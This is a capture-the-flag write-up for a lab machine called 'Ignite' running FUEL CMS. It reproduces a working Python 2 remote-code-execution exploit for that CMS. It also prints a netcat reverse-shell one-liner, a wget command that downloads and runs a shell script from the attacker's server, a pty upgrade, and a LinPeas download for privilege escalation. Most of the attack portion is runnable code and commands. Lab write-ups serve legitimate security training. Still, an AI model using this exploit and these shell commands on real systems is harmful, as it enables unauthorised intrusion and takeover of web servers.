Ignite
Last updated
Last updated
Recognition
nmap -sCV -A -O 10.10.226.192
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS
we have a login page
So I searched about this system (fuel cms) on the exploitdb site and found this:
I will use the RCE Exploit because other else requires authentication and we don't have any credentials
the exploit be like
import requests
import urllib
url = raw_input('target (http://IP:PORT) : ')
def find_nth_overlapping(haystack, needle, n):
start = haystack.find(needle)
while start >= 0 and n > 1:
start = haystack.find(needle, start+1)
n -= 1
return start
while 1:
xxxx = raw_input('cmd:')
burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
r = requests.get(burp0_url)
html = ""
htmlcharset = r.text.find(html)
begin = r.text[0:20]
dup = find_nth_overlapping(r.text,begin,2)
print r.text[0:dup]
and it uses python2
using the RCE we check that the machine has WGET command
so I will use this to download and run a reverse shell file
so I created a .sh file on my machine that contains it:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f
and to access the machine, I used a python server
nc -lvp PORT
python3 -m http.server 80
now I will download the file and run it in the box using RCE
wget IP/revshell.sh -O /tmp/revshell.sh; sh /tmp/revshell.sh
it works
checking if we have python
whereis python
we have python, so we will use it to get a tty
python -c 'import pty;pty.spawn("/bin/bash")'
again using wget, we will use LinPeas to enumerate possible privilege escalation vectors
we will download on our machine, upload a server and then download in the box through our machine
in our machine:
python3 -m http.server 80
in the box
cd /tmp
wget <your_IP>/linpeas.sh
giving the permissions
chmod +x linpeas.sh
running
./linpeas.sh
checking out this database
trying using this password
that's it, thanks for reading